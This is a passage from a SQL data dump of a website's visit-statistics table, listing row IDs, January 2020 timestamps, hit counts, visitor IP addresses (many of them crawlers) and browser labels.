0,'178.154.171.134','other'),(474732,1578580807,2,2,0,0,'85.115.62.180','other'),(474733,1578580841,1,1,0,0,'46.211.148.54','chrome'),(474734,1578581643,1,1,0,0,'8.29.198.25','other'),(474735,1578581721,1,1,0,0,'66.249.64.28','chrome'),(474736,1578582092,1,1,0,0,'207.46.13.20','other'),(474737,1578582382,1,1,0,0,'94.244.45.60','chrome'),(474738,1578582689,1,1,0,0,'178.154.171.127','other'),(474739,1578582861,1,1,0,0,'66.249.64.26','chrome'),(474740,1578583177,2,2,0,0,'91.196.178.89','chrome'),(474741,1578583239,1,1,0,0,'66.249.64.27','chrome'),(474742,1578583497,1,1,0,0,'212.48.94.202','chrome'),(474743,1578583797,1,1,0,0,'178.154.171.134','other'),(474744,1578584507,1,0,1,0,'207.46.13.194',''),(474745,1578585248,3,3,0,0,'207.46.13.194','other'),(474746,1578585328,1,1,0,0,'91.196.178.25','chrome'),(474747,1578586655,1,1,0,0,'46.119.180.141','chrome'),(474748,1578586692,1,1,0,0,'66.249.64.27','chrome'),(474749,1578586994,1,1,0,0,'66.249.64.28','chrome'),(474750,1578589486,1,1,0,0,'178.154.171.134','other'),(474751,1578590064,1,1,0,0,'207.46.13.194','other'),(474752,1578590305,1,1,0,0,'176.114.153.116','chrome'),(474753,1578590535,1,1,0,0,'8.29.198.26','other'),(474754,1578591102,1,1,0,0,'207.46.13.194','other'),(474755,1578592575,1,1,0,0,'8.29.198.25','other'),(474756,1578593263,1,1,0,0,'178.154.171.134','other'),(474757,1578593667,1,1,0,0,'207.46.13.194','other'),(474758,1578594658,1,1,0,0,'149.202.240.207','chrome'),(474759,1578595769,2,2,0,0,'66.249.70.33','chrome'),(474760,1578595964,5,5,0,0,'66.249.64.26','chrome'),(474761,1578595987,3,3,0,0,'66.249.64.27','chrome'),(474762,1578596616,1,1,0,0,'54.208.102.37','other'),(474763,1578596618,1,1,0,0,'107.21.1.8','other'),(474764,1578596629,1,1,0,0,'207.46.13.194','other'),(474765,1578597771,8,8,0,0,'66.249.64.27','chrome'),(474766,1578597820,16,16,0,0,'66.249.64.26','chrome'),(474767,1578597825,2,1,1,0,'66.249.70.62',''),(474768,1578598027,3,3,0,0,'66.249.64.28','chrome'),(474769,1578598284,3,3,0,0,'66.249.70.36','chrome'),(474770,1578598786,2,2,0,0,'66.249.64.27','chrome'),(474771,1578598818,2,2,0,0,'66.249.64.26','chrome'),(474772,1578598939,1,1,0,0,'178.154.171.134','other'),(474773,1578598996,2,2,0,0,'91.219.209.214','chrome'),(474774,1578599058,1,0,1,0,'66.249.70.33',''),(474775,1578599630,1,1,0,0,'91.196.178.183','chrome'),(474776,1578599687,1,1,0,0,'31.13.127.10','other'),(474777,1578599688,1,1,0,0,'31.13.127.6','other'),(474778,1578599690,1,1,0,0,'66.249.64.27','chrome'),(474779,1578599787,1,1,0,0,'31.13.115.6','other'),(474780,1578599788,1,1,0,0,'31.13.103.5','other'),(474781,1578599946,1,1,0,0,'5.3.238.242','msie'),(474782,1578600154,1,1,0,0,'178.151.174.156','chrome'),(474783,1578600156,1,1,0,0,'31.13.127.14','other'),(474784,1578600283,1,1,0,0,'178.154.171.134','other'),(474785,1578600405,1,0,1,0,'66.249.70.36',''),(474786,1578600692,1,1,0,0,'66.249.64.26','chrome'),(474787,1578600767,2,0,2,0,'66.249.70.33',''),(474788,1578601106,1,1,0,0,'46.211.153.125','chrome'),(474789,1578601126,2,2,0,0,'31.13.127.2','other'),(474790,1578601220,1,1,0,0,'51.158.161.141','firefox'),(474791,1578601424,1,1,0,0,'8.29.198.27','other'),(474792,1578601649,1,1,0,0,'66.249.64.28','chrome'),(474793,1578602517,1,1,0,0,'66.249.70.62','chrome'),(474794,1578602693,1,1,0,0,'178.154.171.127','other'),(474795,1578602817,1,1,0,0,'91.196.178.98','chrome'),(474796,1578602943,1,1,0,0,'64.90.40.245','chrome'),(474797,1578603514,1,1,0,0,'8.29.198.26','other'),(474798,1578603848,1,1,0,0,'178.154.171.134','other'),(474799,1578603980,1,1,0,0,'66.249.64.28','chrome'),(474800,1578604696,1,1,0,0,'66.249.64.27','chrome'),(474801,1578606228,1,1,0,0,'91.196.178.98','chrome'),(474802,1578606508,1,1,0,0,'141.8.142.86','other'),(474803,1578607831,2,2,0,0,'192.227.143.46','chrome'),(474804,1578608291,1,1,0,0,'78.111.185.173','chrome'),(474805,1578608592,2,2,0,0,'66.249.64.28','chrome'),(474806,1578609724,1,1,0,0,'160.116.122.206','firefox'),(474807,1578609875,1,0,1,0,'66.249.64.28',''),(474808,1578609880,1,0,1,0,'66.249.64.27',''),(474809,1578610218,3,3,0,0,'66.249.64.28','chrome'),(474810,1578610371,1,1,0,0,'31.13.127.22','other'),(474811,1578610411,1,1,0,0,'17.58.101.25','other'),(474812,1578610661,3,3,0,0,'66.249.64.27','chrome'),(474813,1578610712,1,1,0,0,'66.249.70.36','chrome'),(474814,1578610930,3,3,0,0,'66.249.64.26','chrome'),(474815,1578610936,4,4,0,0,'178.154.171.134','other'),(474816,1578611269,1,1,0,0,'66.249.64.28','chrome'),(474817,1578611917,1,1,0,0,'157.55.39.133','other'),(474818,1578612194,1,1,0,0,'178.162.216.53','chrome'),(474819,1578612309,1,1,0,0,'8.29.198.27','other'),(474820,1578612355,3,3,0,0,'66.249.64.26','chrome'),(474821,1578612368,1,1,0,0,'178.154.171.134','other'),(474822,1578612380,4,4,0,0,'66.249.64.27','chrome'),(474823,1578612443,1,1,0,0,'207.46.13.194','other'),(474824,1578612860,5,5,0,0,'66.249.64.28','chrome'),(474825,1578613014,1,1,0,0,'66.249.70.36','chrome'),(474826,1578613341,1,1,0,0,'66.249.64.27','chrome'),(474827,1578613370,2,2,0,0,'66.249.64.26','chrome'),(474828,1578613486,1,1,0,0,'66.249.70.33','chrome'),(474829,1578613981,1,1,0,0,'141.8.142.2','other'),(474830,1578614016,4,3,1,0,'157.55.39.154',''),(474831,1578614086,1,1,0,0,'66.249.70.62','chrome'),(474832,1578614431,1,1,0,0,'8.29.198.26','other'),(474833,1578615070,1,0,1,0,'157.55.39.154',''),(474834,1578615281,1,1,0,0,'178.154.171.134','other'),(474835,1578616519,2,2,0,0,'66.249.64.26','chrome'),(474836,1578617714,1,1,0,0,'62.205.134.182','other'),(474837,1578617786,1,1,0,0,'178.154.171.134','other'),(474838,1578618671,1,1,0,0,'66.249.64.28','chrome'),(474839,1578619029,2,2,0,0,'157.55.39.154','other'),(474840,1578619033,3,3,0,0,'157.55.39.133','other'),(474841,1578619038,4,4,0,0,'207.46.13.199','other'),(474842,1578619102,1,1,0,0,'178.154.171.134','other'),(474843,1578619189,1,1,0,0,'66.249.70.36','chrome'),(474844,1578620727,1,1,0,0,'66.249.64.28','chrome'),(474845,1578620814,2,2,0,0,'66.249.64.26','chrome'),(474846,1578621165,1,1,0,0,'66.249.70.33','chrome'),(474847,1578621982,2,2,0,0,'66.249.64.26','chrome'),(474848,1578622701,1,1,0,0,'66.249.64.27','chrome'),(474849,1578623190,1,1,0,0,'8.29.198.26','other'),(474850,1578623980,1,1,0,0,'66.249.64.27','chrome'),(474851,1578624158,1,1,0,0,'178.154.171.134','other'),(474852,1578624278,1,1,0,0,'207.46.13.199','other'),(474853,1578625354,1,1,0,0,'8.29.198.26','other'),(474854,1578625427,1,1,0,0,'66.249.64.27','chrome'),(474855,1578625443,2,2,0,0,'66.249.64.28','chrome'),(474856,1578626255,2,2,0,0,'178.154.171.134','other'),(474857,1578626310,2,2,0,0,'66.249.64.26','chrome'),(474858,1578626571,1,1,0,0,'157.55.39.133','other'),(474859,1578627038,2,2,0,0,'66.249.64.27','chrome'),(474860,1578627769,47,47,0,0,'95.91.76.87','other'),(474861,1578627861,1,1,0,0,'178.154.171.134','other'),(474862,1578628455,1,1,0,0,'66.249.64.27','chrome'),(474863,1578629022,1,1,0,0,'178.154.171.134','other'),(474864,1578629256,1,1,0,0,'157.55.39.133','other'),(474865,1578629432,1,1,0,0,'66.249.70.33','chrome'),(474866,1578631132,1,1,0,0,'199.193.224.198','firefox'),(474867,1578631409,2,2,0,0,'178.154.171.134','other'),(474868,1578632759,1,1,0,0,'204.12.197.234','other'),(474869,1578633835,2,2,0,0,'178.154.171.134','other'),(474870,1578634089,1,1,0,0,'8.29.198.26','other'),(474871,1578634208,1,1,0,0,'157.55.39.133','other'),(474872,1578635075,1,1,0,0,'62.205.134.182','other'),(474873,1578635530,1,0,1,0,'66.249.70.33',''),(474874,1578635739,1,1,0,0,'178.154.171.134','other'),(474875,1578636256,1,1,0,0,'8.29.198.26','other'),(474876,1578636721,1,1,0,0,'207.46.13.199','other'),(474877,1578637932,1,1,0,0,'178.154.171.134','other'),(474878,1578638877,1,1,0,0,'31.13.127.2','other'),(474879,1578638879,1,1,0,0,'31.13.127.16','other'),(474880,1578639231,1,1,0,0,'35.161.8.44','chrome'),(474881,1578639235,1,1,0,0,'35.162.70.167','other'),(474882,1578639411,1,1,0,0,'54.70.252.213','chrome'),(474883,1578639595,1,1,0,0,'54.71.56.37','chrome'),(474884,1578641042,1,1,0,0,'66.249.64.28','chrome'),(474885,1578641434,1,0,1,0,'66.249.70.33',''),(474886,1578642722,1,1,0,0,'209.17.96.74','other'),(474887,1578643126,1,1,0,0,'157.55.39.133','other'),(474888,1578643155,1,1,0,0,'91.196.178.168','chrome'),(474889,1578643158,1,1,0,0,'31.13.127.13','other'),(474890,1578643159,1,1,0,0,'31.13.127.1','other'),(474893,1578643482,4,4,0,0,'178.154.171.134','other'),(474894,1578644355,1,1,0,0,'157.55.39.154','other'),(474895,1578644384,1,1,0,0,'77.74.177.114','chrome'),(474896,1578644797,1,1,0,0,'207.46.13.199','other'),(474897,1578644855,1,1,0,0,'93.159.230.28','chrome'),(474898,1578644958,1,1,0,0,'8.29.198.25','other'),(474899,1578645571,1,1,0,0,'207.46.13.70','other'),(474900,1578645839,1,1,0,0,'91.196.178.166','chrome'),(474901,1578645851,1,1,0,0,'176.111.33.18','firefox'),(474902,1578646173,1,1,0,0,'91.196.178.40','chrome'),(474903,1578646183,1,1,0,0,'77.74.177.114','chrome'),(474904,1578647187,1,1,0,0,'8.29.198.26','other'),(474905,1578647398,1,1,0,0,'207.46.13.199','other'),(474906,1578647530,1,1,0,0,'157.55.39.154','other'),(474907,1578647658,1,1,0,0,'207.46.13.173','other'),(474908,1578647985,1,1,0,0,'77.74.177.113','chrome'),(474909,1578649600,1,1,0,0,'207.46.13.199','other'),(474910,1578650008,1,1,0,0,'66.249.64.28','chrome'),(474911,1578650295,1,1,0,0,'78.111.210.31','chrome'),(474912,1578650544,2,2,0,0,'207.46.13.173','other'),(474913,1578650800,1,1,0,0,'31.43.15.78','chrome'),(474914,1578650876,1,1,0,0,'178.154.171.134','other'),(474915,1578651310,1,1,0,0,'46.211.246.33','chrome'),(474916,1578651698,1,1,0,0,'3.231.154.113','chrome'),(474917,1578652138,1,1,0,0,'84.54.12.246','chrome'),(474918,1578652225,2,2,0,0,'207.46.13.70','other'),(474919,1578652248,2,2,0,0,'157.55.39.154','other'),(474920,1578652761,1,1,0,0,'207.46.13.173','other'),(474921,1578652922,51,51,0,0,'192.99.14.117','other'),(474922,1578653572,1,1,0,0,'141.8.142.2','other'),(474923,1578653839,1,1,0,0,'91.196.178.89','chrome'),(474924,1578653844,36,36,0,0,'192.99.14.117','other'),(474925,1578654973,1,1,0,0,'107.6.181.26','chrome'),(474926,1578655028,1,1,0,0,'157.55.39.154','other'),(474927,1578655307,1,1,0,0,'91.196.178.164','chrome'),(474928,1578655436,1,1,0,0,'91.196.178.25','chrome'),(474929,1578655762,1,1,0,0,'109.74.154.72','chrome'),(474930,1578655844,1,1,0,0,'8.29.198.25','other'),(474931,1578656175,1,1,0,0,'207.46.13.70','other'),(474932,1578656460,1,1,0,0,'37.55.130.255','chrome'),(474933,1578656842,1,1,0,0,'178.154.171.134','other'),(474934,1578657912,1,1,0,0,'91.204.115.68','chrome'),(474935,1578657996,1,1,0,0,'207.46.13.70','other'),(474936,1578658045,1,1,0,0,'178.92.143.128','chrome'),(474937,1578658095,1,1,0,0,'8.29.198.27','other'),(474938,1578658260,1,1,0,0,'178.154.171.127','other'),(474939,1578659152,1,1,0,0,'54.208.102.37','other'),(474940,1578659154,1,1,0,0,'107.21.1.8','other'),(474941,1578659243,1,1,0,0,'178.154.171.134','other'),(474942,1578659427,1,1,0,0,'157.55.39.223','other'),(474943,1578659567,2,2,0,0,'162.254.252.116','chrome'),(474944,1578660439,1,1,0,0,'178.154.171.134','other'),(474945,1578660547,1,1,0,0,'185.41.21.83','chrome'),(474946,1578662398,1,1,0,0,'178.154.171.127','other'),(474947,1578662432,1,1,0,0,'178.154.171.134','other'),(474948,1578664035,1,1,0,0,'207.46.13.105','other'),(474949,1578664541,1,1,0,0,'78.111.210.31','chrome'),(474950,1578664658,1,1,0,0,'91.196.178.179','chrome'),(474951,1578664898,2,2,0,0,'178.154.171.134','other'),(474952,1578666465,1,1,0,0,'91.196.178.40','chrome'),(474953,1578666735,1,1,0,0,'8.29.198.27','other'),(474954,1578667400,1,1,0,0,'178.154.171.134','other'),(474955,1578667404,1,1,0,0,'178.154.171.127','other'),(474956,1578668319,2,2,0,0,'178.154.171.134','other'),(474957,1578668569,1,1,0,0,'173.252.127.52','other'),(474958,1578669034,1,1,0,0,'69.171.251.19','other'),(474959,1578669035,1,1,0,0,'69.171.251.27','other'),(474960,1578669039,1,1,0,0,'8.29.198.27','other'),(474961,1578669629,1,1,0,0,'178.154.171.127','other'),(474962,1578672221,1,1,0,0,'178.133.121.146','chrome'),(474963,1578672646,1,1,0,0,'46.211.215.98','chrome'),(474964,1578672859,1,1,0,0,'178.154.171.127','other'),(474965,1578673510,2,2,0,0,'178.154.171.134','other'),(474966,1578673806,1,1,0,0,'178.154.171.127','chrome'),(474967,1578674193,1,1,0,0,'178.154.171.127','other'),(474968,1578675322,1,1,0,0,'157.55.39.223','other'),(474969,1578675543,1,1,0,0,'178.154.171.127','other'),(474970,1578675885,2,2,0,0,'178.154.171.134','other'),(474971,1578676304,1,1,0,0,'157.55.39.150','other'),(474972,1578676757,1,1,0,0,'157.55.39.223','other'),(474973,1578676776,2,2,0,0,'207.46.13.105','other'),(474974,1578677068,1,1,0,0,'178.154.171.134','other'),(474975,1578677629,1,1,0,0,'8.29.198.27','other'),(474976,1578678073,1,1,0,0,'178.154.171.134','other'),(474977,1578678326,1,1,0,0,'157.55.39.223','other'),(474978,1578679172,1,1,0,0,'178.154.171.134','other'),(474979,1578679185,1,1,0,0,'207.46.13.105','other'),(474980,1578679363,1,1,0,0,'178.154.171.127','other'),(474981,1578679973,1,1,0,0,'8.29.198.25','other'),(474982,1578680314,1,1,0,0,'207.46.13.105','other'),(474983,1578680492,2,2,0,0,'157.55.39.223','other'),(474984,1578681130,1,1,0,0,'130.180.212.74','chrome'),(474985,1578681262,2,2,0,0,'178.154.171.134','other'),(474986,1578681439,1,1,0,0,'157.55.39.150','other'),(474987,1578681768,1,1,0,0,'195.201.5.161','chrome'),(474988,1578681977,1,1,0,0,'207.46.13.105','other'),(474989,1578682472,3,3,0,0,'178.154.171.134','other'),(474990,1578682915,1,1,0,0,'157.55.39.150','other'),(474991,1578683319,1,1,0,0,'128.124.201.253','chrome'),(474992,1578683471,1,1,0,0,'178.154.171.127','other'),(474993,1578683861,1,1,0,0,'141.8.142.2','other'),(474994,1578684347,1,1,0,0,'66.249.64.27','chrome'),(474995,1578684562,2,2,0,0,'178.154.171.134','other'),(474996,1578686745,1,1,0,0,'141.8.142.119','other'),(474997,1578687512,1,1,0,0,'207.46.13.105','other'),(474998,1578687930,1,1,0,0,'95.108.213.55','other'),(474999,1578687932,1,1,0,0,'178.154.171.134','other'),(475000,1578688529,1,1,0,0,'8.29.198.25','other'),(475001,1578688875,1,1,0,0,'141.8.132.12','other'),(475002,1578689338,1,1,0,0,'207.46.13.105','other'),(475003,1578689434,1,1,0,0,'95.108.181.104','other'),(475004,1578690103,1,1,0,0,'178.154.171.127','other'),(475005,1578690876,1,1,0,0,'8.29.198.25','other'),(475006,1578690893,1,1,0,0,'34.223.223.112','chrome'),(475007,1578690897,1,1,0,0,'52.34.24.33','other'),(475008,1578692638,1,1,0,0,'178.154.171.127','other'),(475009,1578692641,3,3,0,0,'178.154.171.134','other'),(475010,1578692897,1,1,0,0,'178.136.123.116','chrome'),(475011,1578694102,1,1,0,0,'188.232.124.149','chrome'),(475012,1578694126,1,1,0,0,'178.154.171.127','other'),(475013,1578694351,1,1,0,0,'92.112.105.187','chrome'),(475014,1578694431,1,1,0,0,'31.13.127.12','other'),(475015,1578694432,1,1,0,0,'31.13.127.9','other'),(475018,1578694780,2,2,0,0,'178.154.171.134','other'),(475019,1578695126,1,1,0,0,'5.45.207.90','other'),(475020,1578695363,1,1,0,0,'141.8.142.86','other'),(475021,1578696143,2,2,0,0,'207.46.13.105','other'),(475022,1578696336,1,1,0,0,'157.55.39.150','other'),(475023,1578698785,4,4,0,0,'178.154.171.127','other'),(475024,1578698814,1,1,0,0,'37.9.113.33','other'),(475025,1578698832,1,1,0,0,'37.9.113.97','other'),(475026,1578698885,2,2,0,0,'87.250.224.90','other'),(475027,1578699030,3,3,0,0,'178.154.171.134','other'),(475028,1578699379,1,1,0,0,'207.46.13.120','other'),(475029,1578699416,1,1,0,0,'8.29.198.27','other'),(475030,1578700463,2,2,0,0,'207.46.13.68','other'),(475031,1578700973,1,1,0,0,'207.46.13.120','other'),(475032,1578701164,1,1,0,0,'66.249.64.26','chrome'),(475033,1578701515,2,2,0,0,'207.46.13.167','other'),(475034,1578701771,1,1,0,0,'8.29.198.25','other'),(475035,1578702859,2,2,0,0,'178.154.171.134','other'),(475036,1578702938,1,1,0,0,'107.21.1.8','other'),(475037,1578702940,1,1,0,0,'54.208.102.37','other'),(475038,1578703575,1,1,0,0,'207.46.13.68','other'),(475039,1578703911,2,2,0,0,'178.154.171.134','other'),(475040,1578704114,1,1,0,0,'62.205.134.182','other'),(475041,1578705163,1,1,0,0,'207.46.13.167','other'),(475042,1578705569,1,1,0,0,'66.249.64.27','chrome'),(475043,1578707367,2,0,2,0,'207.46.13.167',''),(475044,1578707786,1,1,0,0,'212.113.133.235','chrome'),(475045,1578707787,1,1,0,0,'81.2.195.80','chrome'),(475046,1578707804,1,1,0,0,'178.154.171.127','other'),(475047,1578707885,1,1,0,0,'178.154.171.134','other'),(475048,1578707988,1,1,0,0,'207.46.13.167','other'),(475049,1578708775,3,3,0,0,'207.180.243.20','chrome'),(475050,1578710295,1,1,0,0,'8.29.198.25','other'),(475051,1578711080,1,1,0,0,'178.154.171.134','other'),(475052,1578711845,1,1,0,0,'157.55.39.227','other'),(475053,1578711981,2,2,0,0,'178.154.171.134','other'),(475054,1578712205,1,1,0,0,'207.46.13.120','other'),(475055,1578712394,1,1,0,0,'207.46.13.68','other'),(475056,1578712660,1,1,0,0,'8.29.198.25','other'),(475057,1578712914,2,2,0,0,'178.154.171.134','other'),(475058,1578713711,1,1,0,0,'178.154.171.127','other'),(475059,1578714461,2,2,0,0,'50.62.161.13','chrome'),(475060,1578714657,3,3,0,0,'178.154.171.134','other'),(475061,1578714805,1,1,0,0,'178.154.171.127','other'),(475062,1578715402,1,1,0,0,'207.46.13.68','other'),(475063,1578716760,1,1,0,0,'207.46.13.167','other'),(475064,1578719866,1,1,0,0,'157.55.39.126','other'),(475065,1578720963,1,1,0,0,'54.202.207.21','chrome'),(475066,1578721182,1,1,0,0,'8.29.198.25','other'),(475067,1578721332,1,0,1,0,'66.249.64.26',''),(475068,1578721351,1,1,0,0,'62.205.134.182','other'),(475069,1578721453,1,1,0,0,'199.127.56.236','chrome'),(475070,1578723554,1,1,0,0,'8.29.198.27','other'),(475071,1578723748,1,1,0,0,'95.108.213.61','other'),(475072,1578725310,1,1,0,0,'66.249.64.28','chrome'),(475073,1578725536,1,1,0,0,'157.55.39.106','other'),(475074,1578726126,1,1,0,0,'82.207.91.234','other'),(475075,1578727422,1,1,0,0,'141.8.142.2','other'),(475076,1578727465,1,1,0,0,'66.249.64.27','chrome'),(475077,1578727658,1,1,0,0,'37.53.90.175','chrome'),(475078,1578727964,1,1,0,0,'91.196.178.85','chrome'),(475079,1578728219,1,1,0,0,'157.55.39.106','other'),(475080,1578728240,1,1,0,0,'94.102.2.238','chrome'),(475081,1578728259,1,1,0,0,'95.132.60.27','chrome'),(475082,1578728641,1,1,0,0,'178.154.171.134','other'),(475083,1578728966,1,1,0,0,'91.196.178.186','chrome'),(475084,1578729858,1,1,0,0,'178.154.171.134','other'),(475085,1578730927,1,1,0,0,'178.154.171.134','other'),(475086,1578731673,2,2,0,0,'157.55.39.10','other'),(475087,1578731676,2,2,0,0,'157.55.39.106','other'),(475088,1578732056,1,1,0,0,'8.29.198.25','other'),(475089,1578732586,1,1,0,0,'66.249.64.28','chrome'),(475090,1578734370,1,1,0,0,'157.55.39.10','other'),(475091,1578734436,1,1,0,0,'8.29.198.26','other'),(475092,1578734534,1,1,0,0,'31.13.127.6','other'),(475093,1578734878,2,2,0,0,'157.55.39.106','other'),(475094,1578734963,1,1,0,0,'178.154.171.134','other'),(475095,1578735094,1,1,0,0,'176.111.33.18','firefox'),(475096,1578736102,1,1,0,0,'88.154.76.239','chrome'),(475097,1578736760,1,1,0,0,'31.13.127.11','other'),(475098,1578738749,1,1,0,0,'207.46.13.134','other'),(475099,1578739340,1,1,0,0,'66.249.64.27','chrome'),(475100,1578739408,2,2,0,0,'157.55.39.10','other'),(475101,1578740131,2,2,0,0,'178.154.171.134','other'),(475102,1578740741,2,2,0,0,'157.55.39.99','other'),(475103,1578741479,1,1,0,0,'31.13.127.1','other'),(475104,1578741480,1,1,0,0,'31.13.127.9','other'),(475105,1578741579,1,1,0,0,'178.154.171.134','other'),(475106,1578742949,1,1,0,0,'8.29.198.25','other'),(475107,1578743382,1,1,0,0,'109.74.154.72','chrome'),(475108,1578744378,1,1,0,0,'178.154.171.134','other'),(475109,1578744937,2,2,0,0,'31.13.115.13','other'),(475110,1578744938,1,1,0,0,'31.13.115.16','other'),(475111,1578744939,1,1,0,0,'31.13.115.3','other'),(475112,1578745351,1,1,0,0,'8.29.198.25','other'),(475113,1578746071,1,0,1,0,'207.46.13.134',''),(475114,1578746426,1,1,0,0,'212.1.108.150','chrome'),(475115,1578746442,1,1,0,0,'178.154.171.127','other'),(475116,1578747256,1,1,0,0,'207.46.13.19','other'),(475117,1578747268,1,1,0,0,'66.102.9.191','chrome'),(475118,1578748255,1,1,0,0,'141.8.142.2','other'),(475119,1578748402,1,0,1,0,'207.46.13.19',''),(475120,1578748949,1,1,0,0,'157.55.39.10','other'),(475121,1578749187,2,2,0,0,'195.10.210.235','chrome'),(475122,1578749544,1,1,0,0,'207.46.13.134','other'),(475123,1578749582,1,1,0,0,'207.46.13.19','other'),(475124,1578749872,1,1,0,0,'54.36.149.38','other'),(475125,1578749977,1,0,1,0,'157.55.39.10',''),(475126,1578751328,1,1,0,0,'54.36.149.57','other'),(475127,1578752533,1,1,0,0,'157.55.39.10','other'),(475128,1578752558,1,1,0,0,'77.222.141.101','chrome'),(475129,1578752792,1,1,0,0,'207.46.13.19','other'),(475130,1578753213,1,1,0,0,'207.46.13.201','other'),(475131,1578753821,1,1,0,0,'8.29.198.25','other'),(475132,1578754029,1,1,0,0,'54.36.149.92','other'),(475133,1578754790,1,1,0,0,'207.46.13.19','other'),(475134,1578756266,1,1,0,0,'31.13.127.20','other'),(475135,1578756268,1,1,0,0,'31.13.127.7','other'),(475136,1578756271,1,1,0,0,'8.29.198.25','other'),(475137,1578756786,7,7,0,0,'35.226.232.68','chrome'),(475138,1578756829,3,3,0,0,'35.224.221.97','chrome'),(475139,1578757179,2,2,0,0,'88.154.182.90','chrome'),(475140,1578757196,1,1,0,0,'91.196.178.74','chrome'),(475141,1578757627,2,2,0,0,'91.209.11.236','other'),(475142,1578757976,1,1,0,0,'207.46.13.134','other'),(475143,1578758902,1,1,0,0,'91.209.11.236','other'),(475144,1578759303,1,1,0,0,'54.36.149.5','other'),(475145,1578759390,1,1,0,0,'66.249.64.26','chrome'),(475146,1578761020,1,1,0,0,'91.196.178.49','chrome'),(475147,1578762282,1,1,0,0,'207.46.13.134','other'),(475148,1578763330,1,1,0,0,'157.55.39.10','other'),(475149,1578764357,1,1,0,0,'207.46.13.19','other'),(475150,1578764686,1,1,0,0,'8.29.198.25','other'),(475151,1578766246,1,1,0,0,'207.46.13.134','other'),(475152,1578766679,1,1,0,0,'31.13.127.6','other'),(475153,1578766681,1,1,0,0,'31.13.127.10','other'),(475154,1578767169,1,1,0,0,'8.29.198.26','other'),(475155,1578767480,1,1,0,0,'78.106.169.40','other'),(475156,1578767655,1,1,0,0,'207.46.13.134','other'),(475157,1578769271,2,2,0,0,'104.208.140.30','other'),(475158,1578772023,2,2,0,0,'66.249.64.28','chrome'),(475159,1578775549,1,1,0,0,'8.29.198.26','other'),(475160,1578775931,2,2,0,0,'207.46.13.134','other'),(475161,1578777519,2,2,0,0,'157.55.39.10','other'),(475162,1578778079,1,1,0,0,'8.29.198.27','other'),(475163,1578779720,1,1,0,0,'54.36.149.91','other'),(475164,1578780273,1,1,0,0,'46.211.155.245','chrome'),(475165,1578780567,1,1,0,0,'54.36.149.20','other'),(475166,1578781847,1,1,0,0,'207.46.13.134','other'),(475167,1578782612,1,1,0,0,'31.13.127.12','other'),(475168,1578782613,1,1,0,0,'31.13.127.20','other'),(475169,1578783620,1,1,0,0,'157.55.39.10','other'),(475170,1578783794,1,1,0,0,'37.73.7.97','chrome'),(475171,1578784606,1,1,0,0,'207.46.13.83','other'),(475172,1578784660,2,2,0,0,'157.55.39.10','other'),(475173,1578785077,1,1,0,0,'54.36.149.50','other'),(475174,1578786404,1,1,0,0,'8.29.198.27','other'),(475175,1578787055,1,1,0,0,'18.191.253.9','chrome'),(475176,1578787974,1,1,0,0,'207.46.13.83','other'),(475177,1578788970,1,1,0,0,'8.29.198.27','other'),(475178,1578788976,1,1,0,0,'54.36.149.93','other'),(475179,1578789017,1,1,0,0,'54.36.149.76','other'),(475180,1578789649,2,2,0,0,'207.46.13.83','other'),(475181,1578790314,1,1,0,0,'54.36.149.56','other'),(475182,1578790514,1,1,0,0,'62.205.134.182','other'),(475183,1578791899,1,1,0,0,'66.249.64.26','chrome'),(475184,1578792285,1,1,0,0,'207.46.13.134','other'),(475185,1578793540,4,0,4,0,'207.46.13.83',''),(475186,1578793853,1,1,0,0,'31.13.115.16','other'),(475187,1578793854,2,2,0,0,'31.13.115.3','other'),(475188,1578793855,1,1,0,0,'31.13.115.8','other'),(475189,1578797266,1,1,0,0,'8.29.198.26','other'),(475190,1578797863,1,1,0,0,'157.55.39.10','other'),(475191,1578798056,1,1,0,0,'31.13.115.7','other'),(475192,1578798057,1,1,0,0,'31.13.115.13','other'),(475193,1578798058,2,2,0,0,'31.13.115.10','other'),(475194,1578798444,1,1,0,0,'54.185.15.77','chrome'),(475195,1578798447,1,1,0,0,'52.41.211.72','other'),(475196,1578798945,1,1,0,0,'13.66.139.0','other'),(475197,1578799872,1,1,0,0,'8.29.198.26','other'),(475198,1578800861,1,1,0,0,'157.55.39.93','other'),(475199,1578801638,1,1,0,0,'54.36.149.107','other'),(475200,1578803507,1,1,0,0,'46.211.128.179','chrome'),(475201,1578804115,1,1,0,0,'77.236.223.92','msie'),(475202,1578805611,1,1,0,0,'207.46.13.160','other'),(475203,1578805957,1,1,0,0,'207.46.13.83','other'),(475204,1578807888,1,1,0,0,'62.205.134.182','other'),(475205,1578808120,1,1,0,0,'8.29.198.25','other'),(475206,1578808685,1,1,0,0,'54.36.149.79','other'),(475207,1578808962,1,1,0,0,'54.36.149.14','other'),(475208,1578809074,1,1,0,0,'207.46.13.160','other'),(475209,1578810089,1,1,0,0,'54.36.149.53','other'),(475210,1578810337,1,1,0,0,'207.46.13.78','other'),(475211,1578810747,1,1,0,0,'8.29.198.26','other'),(475212,1578811523,1,1,0,0,'207.46.13.83','other'),(475213,1578813250,1,0,1,0,'66.249.70.33',''),(475214,1578814628,1,1,0,0,'207.46.13.78','other'),(475215,1578816135,4,4,0,0,'207.46.13.134','other'),(475216,1578816474,1,1,0,0,'157.55.39.111','other'),(475217,1578816700,3,3,0,0,'207.46.13.160','other'),(475218,1578817375,2,2,0,0,'157.55.39.111','other'),(475219,1578818965,1,1,0,0,'8.29.198.27','other'),(475220,1578818986,1,1,0,0,'54.36.149.73','other'),(475221,1578819108,1,1,0,0,'157.55.39.111','other'),(475222,1578819852,1,1,0,0,'66.249.64.28','chrome'),(475223,1578821086,1,1,0,0,'54.36.149.45','other'),(475224,1578821629,1,1,0,0,'8.29.198.25','other'),(475225,1578821706,1,1,0,0,'91.196.179.65','chrome'),(475226,1578822020,3,3,0,0,'207.46.13.141','other'),(475227,1578822885,1,0,1,0,'207.46.13.160',''),(475228,1578824807,1,1,0,0,'157.55.39.111','other'),(475229,1578825442,1,1,0,0,'66.249.64.28','chrome'),(475230,1578825619,1,1,0,0,'107.21.1.8','other'),(475231,1578825624,1,1,0,0,'54.208.102.37','other'),(475232,1578826068,1,1,0,0,'157.55.39.111','other'),(475233,1578826453,1,1,0,0,'178.154.171.127','other'),(475234,1578828361,1,1,0,0,'109.74.154.72','chrome'),(475235,1578829808,1,1,0,0,'8.29.198.25','other'),(475236,1578829837,1,1,0,0,'46.22.211.9','firefox'),(475237,1578832513,1,1,0,0,'8.29.198.27','other'),(475238,1578833587,1,1,0,0,'46.133.211.74','chrome'),(475239,1578833796,1,1,0,0,'178.154.171.127','other'),(475240,1578834476,1,1,0,0,'178.154.171.134','other'),(475241,1578836087,1,1,0,0,'178.154.171.134','other'),(475242,1578839270,1,1,0,0,'1